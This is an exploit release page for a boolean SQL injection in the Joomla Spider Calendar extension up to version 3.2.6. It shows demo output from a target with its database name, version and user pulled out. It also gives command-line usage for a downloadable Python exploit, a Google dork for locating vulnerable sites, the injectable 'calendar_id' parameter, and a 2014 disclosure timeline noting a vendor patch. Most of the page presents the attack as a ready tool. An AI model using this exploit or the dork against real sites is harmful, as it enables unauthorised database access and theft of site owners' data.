Joomla Spider Calendar 3.2.6 SQL Injection Exploit + Demo

Joomla Spider Calendar

 

   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__|
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|
                                                                          $$ |
                                                                          $$ |
                                                                          \__|

     $$$$$$\            $$\                           $$\                            $$$$$$\       $$$$$$\      $$$$$$\
    $$  __$$\           $$ |                          $$ |                          $$ ___$$\     $$  __$$\    $$  __$$\
    $$ /  \__| $$$$$$\  $$ | $$$$$$\  $$$$$$$\   $$$$$$$ | $$$$$$\   $$$$$$\        \_/   $$ |    \__/  $$ |   $$ /  \__|
    $$ |       \____$$\ $$ |$$  __$$\ $$  __$$\ $$  __$$ | \____$$\ $$  __$$\         $$$$$ /      $$$$$$  |   $$$$$$$\
    $$ |       $$$$$$$ |$$ |$$$$$$$$ |$$ |  $$ |$$ /  $$ | $$$$$$$ |$$ |  \__|        \___$$\     $$  ____/    $$  __$$\
    $$ |  $$\ $$  __$$ |$$ |$$   ____|$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |            $$\   $$ |    $$ |         $$ /  $$ |
    \$$$$$$  |\$$$$$$$ |$$ |\$$$$$$$\ $$ |  $$ |\$$$$$$$ |\$$$$$$$ |$$ |            \$$$$$$  |$$\ $$$$$$$$\ $$\ $$$$$$  |
     \______/  \_______|\__| \_______|\__|  \__| \_______| \_______|\__|             \______/ \__|\________|\__|\______/

                                                                                         j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi

                                                            Written by:

                                                          Claudio Viviani

                                                       http://www.homelab.it

                                                          info@homelab.it
                                                       homelabit@protonmail.ch

                                                 https://www.facebook.com/homelabit
                                                    https://twitter.com/homelabit
                                                 https://plus.google.com/+HomelabIt1/
                                        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Searching for Joomla Spider Calendar vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 3.2.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost

 

 

Exploit Usage

1) Joomla standard path:    http://localhost/index.php?option=com_spidercalendar
                            [user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost

2) Joomla Custom path:      http://localhost/joomla/index.php?option=com_spidercalendar
                            [user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost -b joomla

Download

Download : j00ml4_spider_calendar_326_sqli.py
           j00ml4_spider_calendar_326_sqli.py (Mega mirror)

Info

######################

# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://web-dorado.com/

# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

# Dork Google: inurl:option=com_spidercalendar

# Date : 2014-08-31

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi]

"calendar_id" variable is not sanitized.

######################

# Vulnerability Disclosure Timeline:

2014-08-31:  Discovered vulnerability
2014-09-04:  Vendor Notification
2014-09-05:  Vendor Response/Feedback
2014-09-05:  Vendor Fix/Patch
2014-09-05:  Public Disclosure
 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
        
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################